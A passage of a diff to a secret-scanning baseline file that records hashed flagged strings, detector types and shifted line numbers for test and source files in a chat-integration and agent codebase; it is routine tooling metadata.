false, - "line_number": 178 + "line_number": 192 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/reactions.test.ts", "hashed_secret": "a4a05c9a6449eb9d6cdac81dd7edc49230e327e6", "is_verified": false, - "line_number": 209 + "line_number": 223 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/reactions.test.ts", "hashed_secret": "a2833da9f0a16f09994754d0a31749cecf8c8c77", "is_verified": false, - "line_number": 315 + "line_number": 295 } ], "extensions/bluebubbles/src/send.test.ts": [ @@ -10935,14 +10995,14 @@ "filename": "extensions/bluebubbles/src/send.test.ts", "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", "is_verified": false, - "line_number": 55 + "line_number": 79 }, { "type": "Secret Keyword", "filename": "extensions/bluebubbles/src/send.test.ts", "hashed_secret": "faacad0ce4ea1c19b46e128fd79679d37d3d331d", "is_verified": false, - "line_number": 692 + "line_number": 757 } ], "extensions/bluebubbles/src/targets.test.ts": [ @@ -10951,16 +11011,7 @@ "filename": "extensions/bluebubbles/src/targets.test.ts", "hashed_secret": "a3af2fb0c1e2a30bb038049e1e4b401593af6225", "is_verified": false, - "line_number": 61 - } - ], - "extensions/bluebubbles/src/targets.ts": [ - { - "type": "Hex High Entropy String", - "filename": "extensions/bluebubbles/src/targets.ts", - "hashed_secret": "a3af2fb0c1e2a30bb038049e1e4b401593af6225", - "is_verified": false, - "line_number": 265 + "line_number": 62 } ], "extensions/copilot-proxy/index.ts": [ @@ -10972,6 +11023,22 @@ "line_number": 9 } ], + "extensions/diagnostics-otel/src/service.test.ts": [ + { + "type": "Base64 High Entropy String", + "filename": "extensions/diagnostics-otel/src/service.test.ts", + "hashed_secret": "e6aa9dc072fcb9dbe42761f25c976143c39d3deb", + "is_verified": false, + "line_number": 332 + }, + { + "type": "Base64 High Entropy String", + "filename": "extensions/diagnostics-otel/src/service.test.ts", + "hashed_secret": "7e634f2e8cbddf340740ee856bf272aaa6d6d770", + "is_verified": false, + "line_number": 352 + } + ], "extensions/feishu/skills/feishu-doc/SKILL.md": [ { "type": "Hex High Entropy String", @@ -10990,6 +11057,66 @@ "line_number": 40 } ], + "extensions/feishu/src/accounts.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/accounts.test.ts", + "hashed_secret": "e066a1720c6745f87bad43d4dc1206a6beaf4298", + "is_verified": false, + "line_number": 19 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/accounts.test.ts", + "hashed_secret": "32db07403e892e96ab02693d38bffb2777e82c94", + "is_verified": false, + "line_number": 20 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/accounts.test.ts", + "hashed_secret": "b72c7c889dbb48caa14157494693a442309d9f08", + "is_verified": false, + "line_number": 51 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/accounts.test.ts", + "hashed_secret": "d15b430d272b72b4149afe9098236dd161888d76", + "is_verified": false, + "line_number": 167 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/accounts.test.ts", + "hashed_secret": "ea45a4958bbb18451e1d48aa90745cb35a508b29", + "is_verified": false, + "line_number": 239 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/accounts.test.ts", + "hashed_secret": "3017efcbcc4d30831b27c2793bac8e7ea61c905a", + "is_verified": false, + "line_number": 254 + } + ], + "extensions/feishu/src/bot.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/bot.test.ts", + "hashed_secret": "6ccf7c8dbcc240973f7793b6bbc8f1d5e6efd4b1", + "is_verified": false, + "line_number": 1091 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/bot.test.ts", + "hashed_secret": "1962fc9032fed7c415a657282d617ba80e82f884", + "is_verified": false, + "line_number": 1154 + } + ], "extensions/feishu/src/channel.test.ts": [ { "type": "Secret Keyword", @@ -10999,13 +11126,140 @@ "line_number": 21 } ], + "extensions/feishu/src/chat.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/chat.test.ts", + "hashed_secret": "f49922d511d666848f250663c4fca84074b856a8", + "is_verified": false, + "line_number": 32 + } + ], + "extensions/feishu/src/client.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "2e8a3d5cbfeb3818c59b66a9f0bf3b80990489f3", + "is_verified": false, + "line_number": 62 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "cfc5057763ea7dabd5c6f7325c0d39c9b8d1baf1", + "is_verified": false, + "line_number": 105 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "8636f9964c42d12b2d698204e426276c41df66d1", + "is_verified": false, + "line_number": 113 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "2e59eff806170ad50c34e3372faef694874fae93", + "is_verified": false, + "line_number": 135 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "f4e4e5f8d09c24c2863cceca031e94154a63e138", + "is_verified": false, + "line_number": 154 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "e55783e61a4f2ae1efd1d1ccb142c902c473ef86", + "is_verified": false, + "line_number": 176 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "67db48d9a41265dfca56d8b198f3e28ee9b6bbcb", + "is_verified": false, + "line_number": 200 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "b8d75c4b958af69d9be3c2efa450e7c4a1b41770", + "is_verified": false, + "line_number": 222 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "f546848b2bf72fec2651db6b80e5592fda678e2f", + "is_verified": false, + "line_number": 245 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/client.test.ts", + "hashed_secret": "c7c5ddbf5e808a49ef38791caf8563c0bc0da434", + "is_verified": false, + "line_number": 264 + } + ], + "extensions/feishu/src/config-schema.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/config-schema.test.ts", + "hashed_secret": "d25db33e5c07ac669f08da0adc2bde73b15ee929", + "is_verified": false, + "line_number": 39 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/config-schema.test.ts", + "hashed_secret": "8437d84cae482d10a2b9fd3f555d45006979e4be", + "is_verified": false, + "line_number": 67 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/config-schema.test.ts", + "hashed_secret": "32db07403e892e96ab02693d38bffb2777e82c94", + "is_verified": false, + "line_number": 174 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/config-schema.test.ts", + "hashed_secret": "2bd27e71d7e14bbd5ac1576290ed6074dc450b5a", + "is_verified": false, + "line_number": 185 + } + ], + "extensions/feishu/src/docx.account-selection.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/docx.account-selection.test.ts", + "hashed_secret": "db2b80fd220b75be76e698a9164f989baf731caf", + "is_verified": false, + "line_number": 30 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/docx.account-selection.test.ts", + "hashed_secret": "57cb5f8d57e1a3c1bcf90d73e103af6a775591a6", + "is_verified": false, + "line_number": 31 + } + ], "extensions/feishu/src/docx.test.ts": [ { "type": "Secret Keyword", "filename": "extensions/feishu/src/docx.test.ts", "hashed_secret": "f49922d511d666848f250663c4fca84074b856a8", "is_verified": false, - "line_number": 97 + "line_number": 124 } ], "extensions/feishu/src/media.test.ts": [ @@ -11014,7 +11268,83 @@ "filename": "extensions/feishu/src/media.test.ts", "hashed_secret": "f49922d511d666848f250663c4fca84074b856a8", "is_verified": false, - "line_number": 45 + "line_number": 76 + } + ], + "extensions/feishu/src/monitor.webhook-security.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/monitor.webhook-security.test.ts", + "hashed_secret": "cf27add3cb4cb83efe9a48cf7289068fa869c4cd", + "is_verified": false, + "line_number": 76 + } + ], + "extensions/feishu/src/onboarding.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/onboarding.test.ts", + "hashed_secret": "2e8a3d5cbfeb3818c59b66a9f0bf3b80990489f3", + "is_verified": false, + "line_number": 64 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/onboarding.test.ts", + "hashed_secret": "d5fc216f56ec5ef58691c854104ba78667d9efad", + "is_verified": false, + "line_number": 78 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/onboarding.test.ts", + "hashed_secret": "d819cf9769641b789fc8f539e0cd8cbe5606e057", + "is_verified": false, + "line_number": 82 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/onboarding.test.ts", + "hashed_secret": "72b6d12b3e7034420015375375466c37ec68be51", + "is_verified": false, + "line_number": 114 + } + ], + "extensions/feishu/src/probe.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/probe.test.ts", + "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "is_verified": false, + "line_number": 37 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/probe.test.ts", + "hashed_secret": "640d87e741e6aa4c669a82a4cd304787960513ab", + "is_verified": false, + "line_number": 195 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/probe.test.ts", + "hashed_secret": "4205714cdfe14ed9e3d030ddf7887781b964f510", + "is_verified": false, + "line_number": 199 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/probe.test.ts", + "hashed_secret": "5a718c07b29bb4cd5fafb4a3ad377efc2dad9a59", + "is_verified": false, + "line_number": 214 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/probe.test.ts", + "hashed_secret": "5da0807f9682b03d10b7906c5d2312d46368500c", + "is_verified": false, + "line_number": 219 } ], "extensions/feishu/src/reply-dispatcher.test.ts": [ @@ -11023,16 +11353,23 @@ "filename": "extensions/feishu/src/reply-dispatcher.test.ts", "hashed_secret": "f49922d511d666848f250663c4fca84074b856a8", "is_verified": false, - "line_number": 48 + "line_number": 74 } ], - "extensions/google-antigravity-auth/index.ts": [ + "extensions/feishu/src/tool-account-routing.test.ts": [ { - "type": "Base64 High Entropy String", - "filename": "extensions/google-antigravity-auth/index.ts", - "hashed_secret": "709d0f232b6ac4f8d24dec3e4fabfdb14257174f", + "type": "Secret Keyword", + "filename": "extensions/feishu/src/tool-account-routing.test.ts", + "hashed_secret": "db2b80fd220b75be76e698a9164f989baf731caf", "is_verified": false, - "line_number": 14 + "line_number": 38 + }, + { + "type": "Secret Keyword", + "filename": "extensions/feishu/src/tool-account-routing.test.ts", + "hashed_secret": "57cb5f8d57e1a3c1bcf90d73e103af6a775591a6", + "is_verified": false, + "line_number": 43 } ], "extensions/google-gemini-cli-auth/oauth.test.ts": [ @@ -11041,7 +11378,32 @@ "filename": "extensions/google-gemini-cli-auth/oauth.test.ts", "hashed_secret": "021343c1f561d7bcbc3b513df45cc3a6baf67b43", "is_verified": false, - "line_number": 30 + "line_number": 43 + }, + { + "type": "Secret Keyword", + "filename": "extensions/google-gemini-cli-auth/oauth.test.ts", + "hashed_secret": "07d1db7c4a73c573d6d038b3d26194a7957c513c", + "is_verified": false, + "line_number": 311 + } + ], + "extensions/googlechat/src/api.test.ts": [ + { + "type": "Base64 High Entropy String", + "filename": "extensions/googlechat/src/api.test.ts", + "hashed_secret": "bc7bd07bb0114ca5928ca561817efc6cd7083966", + "is_verified": false, + "line_number": 84 + } + ], + "extensions/googlechat/src/channel.outbound.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/googlechat/src/channel.outbound.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 50 } ], "extensions/irc/src/accounts.ts": [ @@ -11050,7 +11412,7 @@ "filename": "extensions/irc/src/accounts.ts", "hashed_secret": "920f8f5815b381ea692e9e7c2f7119f2b1aa620a", "is_verified": false, - "line_number": 19 + "line_number": 24 } ], "extensions/irc/src/client.test.ts": [ @@ -11075,7 +11437,7 @@ "filename": "extensions/line/src/channel.startup.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 103 + "line_number": 94 } ], "extensions/matrix/src/matrix/accounts.test.ts": [ @@ -11112,13 +11474,36 @@ "line_number": 8 } ], + "extensions/mattermost/src/normalize.test.ts": [ + { + "type": "Hex High Entropy String", + "filename": "extensions/mattermost/src/normalize.test.ts", + "hashed_secret": "713ecccd228f49a6068bedd7a64510b50b4284e5", + "is_verified": false, + "line_number": 77 + }, + { + "type": "Base64 High Entropy String", + "filename": "extensions/mattermost/src/normalize.test.ts", + "hashed_secret": "a8e2493e7579ba630d56b2552d5fd2a7198ad943", + "is_verified": false, + "line_number": 82 + }, + { + "type": "Base64 High Entropy String", + "filename": "extensions/mattermost/src/normalize.test.ts", + "hashed_secret": "9a33401dd4f9784482d2db77bbe93d99cea1a571", + "is_verified": false, + "line_number": 94 + } + ], "extensions/memory-lancedb/config.ts": [ { "type": "Secret Keyword", "filename": "extensions/memory-lancedb/config.ts", "hashed_secret": "ecb252044b5ea0f679ee78ec1a12904739e2904d", "is_verified": false, - "line_number": 101 + "line_number": 105 } ], "extensions/memory-lancedb/index.test.ts": [ @@ -11130,6 +11515,15 @@ "line_number": 71 } ], + "extensions/msteams/src/monitor.lifecycle.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/msteams/src/monitor.lifecycle.test.ts", + "hashed_secret": "5a21585c3dfc2797afe4634fa150d996f4ef5b5e", + "is_verified": false, + "line_number": 143 + } + ], "extensions/msteams/src/probe.test.ts": [ { "type": "Secret Keyword", @@ -11139,20 +11533,45 @@ "line_number": 35 } ], + "extensions/msteams/src/token.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/msteams/src/token.test.ts", + "hashed_secret": "5a21585c3dfc2797afe4634fa150d996f4ef5b5e", + "is_verified": false, + "line_number": 38 + } + ], "extensions/nextcloud-talk/src/accounts.ts": [ { "type": "Secret Keyword", "filename": "extensions/nextcloud-talk/src/accounts.ts", "hashed_secret": "920f8f5815b381ea692e9e7c2f7119f2b1aa620a", "is_verified": false, - "line_number": 22 + "line_number": 31 }, { "type": "Secret Keyword", "filename": "extensions/nextcloud-talk/src/accounts.ts", "hashed_secret": "71f8e7976e4cbc4561c9d62fb283e7f788202acb", "is_verified": false, - "line_number": 151 + "line_number": 169 + } + ], + "extensions/nextcloud-talk/src/channel.startup.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/nextcloud-talk/src/channel.startup.test.ts", + "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "is_verified": false, + "line_number": 24 + }, + { + "type": "Secret Keyword", + "filename": "extensions/nextcloud-talk/src/channel.startup.test.ts", + "hashed_secret": "dfba7aade0868074c2861c98e2a9a92f3178a51b", + "is_verified": false, + "line_number": 25 } ], "extensions/nextcloud-talk/src/channel.ts": [ @@ -11161,7 +11580,16 @@ "filename": "extensions/nextcloud-talk/src/channel.ts", "hashed_secret": "71f8e7976e4cbc4561c9d62fb283e7f788202acb", "is_verified": false, - "line_number": 396 + "line_number": 399 + } + ], + "extensions/nextcloud-talk/src/send.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/nextcloud-talk/src/send.test.ts", + "hashed_secret": "dbdab9be92cacdae6a97e8601332bfaa8545800f", + "is_verified": false, + "line_number": 11 } ], "extensions/nostr/README.md": [ @@ -11173,6 +11601,36 @@ "line_number": 46 } ], + "extensions/nostr/src/channel.outbound.test.ts": [ + { + "type": "Hex High Entropy String", + "filename": "extensions/nostr/src/channel.outbound.test.ts", + "hashed_secret": "ce4303f6b22257d9c9cf314ef1dee4707c6e1c13", + "is_verified": false, + "line_number": 54 + }, + { + "type": "Secret Keyword", + "filename": "extensions/nostr/src/channel.outbound.test.ts", + "hashed_secret": "ce4303f6b22257d9c9cf314ef1dee4707c6e1c13", + "is_verified": false, + "line_number": 54 + }, + { + "type": "Hex High Entropy String", + "filename": "extensions/nostr/src/channel.outbound.test.ts", + "hashed_secret": "e8b2cccf31904f5d9c62838922648cfeaa4c07e0", + "is_verified": false, + "line_number": 55 + }, + { + "type": "Secret Keyword", + "filename": "extensions/nostr/src/channel.outbound.test.ts", + "hashed_secret": "44682b9fe21c229330c1e5cf9c414d4267d97719", + "is_verified": false, + "line_number": 66 + } + ], "extensions/nostr/src/channel.test.ts": [ { "type": "Hex High Entropy String", @@ -11287,7 +11745,7 @@ "filename": "extensions/nostr/src/types.test.ts", "hashed_secret": "3bee216ebc256d692260fc3adc765050508fef5e", "is_verified": false, - "line_number": 123 + "line_number": 141 } ], "extensions/open-prose/skills/prose/SKILL.md": [ @@ -11315,6 +11773,38 @@ "line_number": 200 } ], + "extensions/slack/src/channel.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/slack/src/channel.test.ts", + "hashed_secret": "514f52b114ae97e309055b6f419798569dc48a2b", + "is_verified": false, + "line_number": 147 + }, + { + "type": "Secret Keyword", + "filename": "extensions/slack/src/channel.test.ts", + "hashed_secret": "071d3673192b4b44a84aa73ac9d00c155821303b", + "is_verified": false, + "line_number": 217 + }, + { + "type": "Secret Keyword", + "filename": "extensions/slack/src/channel.test.ts", + "hashed_secret": "dfba7aade0868074c2861c98e2a9a92f3178a51b", + "is_verified": false, + "line_number": 219 + } + ], + "extensions/telegram/src/channel.test.ts": [ + { + "type": "Secret Keyword", + "filename": "extensions/telegram/src/channel.test.ts", + "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "is_verified": false, + "line_number": 132 + } + ], "extensions/twitch/src/onboarding.test.ts": [ { "type": "Secret Keyword", @@ -11337,7 +11827,7 @@ "filename": "extensions/twitch/src/status.test.ts", "hashed_secret": "f2b14f68eb995facb3a1c35287b778d5bd785511", "is_verified": false, - "line_number": 122 + "line_number": 92 } ], "extensions/voice-call/README.md": [ @@ -11355,7 +11845,7 @@ "filename": "extensions/voice-call/src/config.test.ts", "hashed_secret": "62207a469ec2fdcfc7d66b04c2980ac1501acbf0", "is_verified": false, - "line_number": 129 + "line_number": 39 } ], "extensions/voice-call/src/providers/telnyx.test.ts": [ @@ -11376,15 +11866,6 @@ "line_number": 41 } ], - "extensions/zalo/src/monitor.webhook.test.ts": [ - { - "type": "Secret Keyword", - "filename": "extensions/zalo/src/monitor.webhook.test.ts", - "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", - "is_verified": false, - "line_number": 40 - } - ], "skills/1password/references/cli-examples.md": [ { "type": "Secret Keyword", @@ -11412,82 +11893,181 @@ "line_number": 22 } ], - "src/agents/compaction.tool-result-details.e2e.test.ts": [ + "src/acp/client.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/compaction.tool-result-details.e2e.test.ts", + "filename": "src/acp/client.test.ts", + "hashed_secret": "d862c48593628a39a76daafde56f16b69eddd7c2", + "is_verified": false, + "line_number": 69 + }, + { + "type": "Secret Keyword", + "filename": "src/acp/client.test.ts", + "hashed_secret": "aac1281207c0f83f113d70cd1200bd86ce30ffcb", + "is_verified": false, + "line_number": 70 + }, + { + "type": "Secret Keyword", + "filename": "src/acp/client.test.ts", + "hashed_secret": "787951939f82ab64286006ce2a430e06c6d54086", + "is_verified": false, + "line_number": 71 + }, + { + "type": "Secret Keyword", + "filename": "src/acp/client.test.ts", + "hashed_secret": "d503c694c0e762d786079a3f8bd6df32de508a9b", + "is_verified": false, + "line_number": 85 + }, + { + "type": "Secret Keyword", + "filename": "src/acp/client.test.ts", + "hashed_secret": "0d8c5e792dc079c912039086e892330076db8129", + "is_verified": false, + "line_number": 98 + } + ], + "src/acp/server.startup.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/acp/server.startup.test.ts", + "hashed_secret": "60fe331dc434ac211c53f33da22a384aa0e3fec5", + "is_verified": false, + "line_number": 183 + } + ], + "src/agents/auth-profiles/oauth.openai-codex-refresh-fallback.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/auth-profiles/oauth.openai-codex-refresh-fallback.test.ts", + "hashed_secret": "02ecb94373bfb3dfe827ca18409f50b016e8302a", + "is_verified": false, + "line_number": 26 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/auth-profiles/oauth.openai-codex-refresh-fallback.test.ts", + "hashed_secret": "f8ca0d7266886f4b5be9adddc9b66017b3bf1a4b", + "is_verified": false, + "line_number": 27 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/auth-profiles/oauth.openai-codex-refresh-fallback.test.ts", + "hashed_secret": "0775624b6a8da2aaf29e334372656c1b657c21b7", + "is_verified": false, + "line_number": 94 + } + ], + "src/agents/compaction.tool-result-details.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/compaction.tool-result-details.test.ts", "hashed_secret": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", "is_verified": false, - "line_number": 50 + "line_number": 57 } ], - "src/agents/memory-search.e2e.test.ts": [ + "src/agents/memory-search.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/memory-search.e2e.test.ts", + "filename": "src/agents/memory-search.test.ts", "hashed_secret": "a1b49d68a91fdf9c9217773f3fac988d77fa0f50", "is_verified": false, - "line_number": 189 + "line_number": 191 } ], - "src/agents/minimax-vlm.normalizes-api-key.e2e.test.ts": [ + "src/agents/minimax-vlm.normalizes-api-key.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/minimax-vlm.normalizes-api-key.e2e.test.ts", + "filename": "src/agents/minimax-vlm.normalizes-api-key.test.ts", "hashed_secret": "8a8461b67e3fe515f248ac2610fd7b1f4fc3b412", "is_verified": false, - "line_number": 28 + "line_number": 29 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/minimax-vlm.normalizes-api-key.test.ts", + "hashed_secret": "bcdec29c5e1ade0fc995c3a18862f0111e51a998", + "is_verified": false, + "line_number": 56 } ], - "src/agents/model-auth.e2e.test.ts": [ + "src/agents/model-auth-label.test.ts": [ + { + "type": "GitHub Token", + "filename": "src/agents/model-auth-label.test.ts", + "hashed_secret": "e175c6f5f2a92e8623bd9a4820edb4e8c1b0fd10", + "is_verified": false, + "line_number": 35 + }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth-label.test.ts", + "hashed_secret": "6367c48dd193d56ea7b0baad25b19455e529f5ee", + "is_verified": false, + "line_number": 55 + } + ], + "src/agents/model-auth.profiles.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "07a6b9cec637c806195e8aa7e5c0851ab03dc35e", "is_verified": false, - "line_number": 228 + "line_number": 194 }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "21f296583ccd80c5ab9b3330a8b0d47e4a409fb9", "is_verified": false, - "line_number": 254 + "line_number": 208 }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "b65888424ecafcc98bfd803b24817e4dadf821f8", "is_verified": false, - "line_number": 275 + "line_number": 219 }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth.profiles.test.ts", + "hashed_secret": "b17453920671d0cb8a415b649a066b3df3d36fb0", + "is_verified": false, + "line_number": 253 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "77e991e9f56e6fa4ed1a908208048421f1214c07", "is_verified": false, - "line_number": 296 + "line_number": 286 }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "dff6d4ff5dc357cf451d1855ab9cbda562645c9f", "is_verified": false, - "line_number": 319 + "line_number": 301 }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "b43be360db55d89ec6afd74d6ed8f82002fe4982", "is_verified": false, - "line_number": 374 + "line_number": 333 }, { "type": "Secret Keyword", - "filename": "src/agents/model-auth.e2e.test.ts", + "filename": "src/agents/model-auth.profiles.test.ts", "hashed_secret": "5b850e9dc678446137ff6d905ebd78634d687fdd", "is_verified": false, - "line_number": 395 + "line_number": 344 } ], "src/agents/model-auth.ts": [ @@ -11499,38 +12079,118 @@ "line_number": 25 } ], + "src/agents/model-fallback.run-embedded.e2e.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/model-fallback.run-embedded.e2e.test.ts", + "hashed_secret": "845fa28a5bf5d82cfa91a00ef9cf6cca8aef00db", + "is_verified": false, + "line_number": 111 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/model-fallback.run-embedded.e2e.test.ts", + "hashed_secret": "19e506a6fcda111778646087fb7aad7f00267113", + "is_verified": false, + "line_number": 127 + } + ], "src/agents/models-config.e2e-harness.ts": [ { "type": "Secret Keyword", "filename": "src/agents/models-config.e2e-harness.ts", "hashed_secret": "7cf31e8b6cda49f70c31f1f25af05d46f924142d", "is_verified": false, - "line_number": 110 + "line_number": 130 } ], - "src/agents/models-config.fills-missing-provider-apikey-from-env-var.e2e.test.ts": [ + "src/agents/models-config.fills-missing-provider-apikey-from-env-var.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/models-config.fills-missing-provider-apikey-from-env-var.e2e.test.ts", - "hashed_secret": "fcdd655b11f33ba4327695084a347b2ba192976c", + "filename": "src/agents/models-config.fills-missing-provider-apikey-from-env-var.test.ts", + "hashed_secret": "2a9da819718779deba96d5aee1d1f4948047c2bd", "is_verified": false, - "line_number": 19 + "line_number": 46 }, { "type": "Secret Keyword", - "filename": "src/agents/models-config.fills-missing-provider-apikey-from-env-var.e2e.test.ts", - "hashed_secret": "3a81eb091f80c845232225be5663d270e90dacb7", + "filename": "src/agents/models-config.fills-missing-provider-apikey-from-env-var.test.ts", + "hashed_secret": "fa9144b340ea7886885669e2e7a808c86ee14a07", "is_verified": false, - "line_number": 73 - } - ], - "src/agents/models-config.normalizes-gemini-3-ids-preview-google-providers.e2e.test.ts": [ + "line_number": 117 + }, { "type": "Secret Keyword", - "filename": "src/agents/models-config.normalizes-gemini-3-ids-preview-google-providers.e2e.test.ts", + "filename": "src/agents/models-config.fills-missing-provider-apikey-from-env-var.test.ts", + "hashed_secret": "3a81eb091f80c845232225be5663d270e90dacb7", + "is_verified": false, + "line_number": 181 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.fills-missing-provider-apikey-from-env-var.test.ts", + "hashed_secret": "565a8d87240aae631d7a901c1f697d46ee141a7b", + "is_verified": false, + "line_number": 214 + } + ], + "src/agents/models-config.normalizes-gemini-3-ids-preview-google-providers.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.normalizes-gemini-3-ids-preview-google-providers.test.ts", "hashed_secret": "980d02eb9335ae7c9e9984f6c8ad432352a0d2ac", "is_verified": false, - "line_number": 20 + "line_number": 17 + } + ], + "src/agents/models-config.providers.google-antigravity.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.google-antigravity.test.ts", + "hashed_secret": "65ef0bf81fc443b3e15a494151196f38c8273c96", + "is_verified": false, + "line_number": 27 + } + ], + "src/agents/models-config.providers.kilocode.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.kilocode.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 24 + } + ], + "src/agents/models-config.providers.kimi-coding.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.kimi-coding.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 12 + } + ], + "src/agents/models-config.providers.normalize-keys.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.normalize-keys.test.ts", + "hashed_secret": "ba4d38e2a7e8c718913887136d2526351d05cd69", + "is_verified": false, + "line_number": 16 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.normalize-keys.test.ts", + "hashed_secret": "02ecb94373bfb3dfe827ca18409f50b016e8302a", + "is_verified": false, + "line_number": 46 + }, + { + "type": "Secret Keyword", + "filename": "src/agents/models-config.providers.normalize-keys.test.ts", + "hashed_secret": "b9cdfe69a75e4f2491bcbaf1934ab5e4fd69eb6b", + "is_verified": false, + "line_number": 52 } ], "src/agents/models-config.providers.nvidia.test.ts": [ @@ -11546,38 +12206,54 @@ "filename": "src/agents/models-config.providers.nvidia.test.ts", "hashed_secret": "be1a7be9d4d5af417882b267f4db6dddc08507bd", "is_verified": false, - "line_number": 27 + "line_number": 22 } ], - "src/agents/models-config.providers.ollama.e2e.test.ts": [ + "src/agents/models-config.providers.ollama.test.ts": [ { "type": "Secret Keyword", - "filename": "src/agents/models-config.providers.ollama.e2e.test.ts", + "filename": "src/agents/models-config.providers.ollama.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 37 - } - ], - "src/agents/models-config.providers.qianfan.e2e.test.ts": [ + "line_number": 54 + }, { "type": "Secret Keyword", - "filename": "src/agents/models-config.providers.qianfan.e2e.test.ts", + "filename": "src/agents/models-config.providers.ollama.test.ts", + "hashed_secret": 